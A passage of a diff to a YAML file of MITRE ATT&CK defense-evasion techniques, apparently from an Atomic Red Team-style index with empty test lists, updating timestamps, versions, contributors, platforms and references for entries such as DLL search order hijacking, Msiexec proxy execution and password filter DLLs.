         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
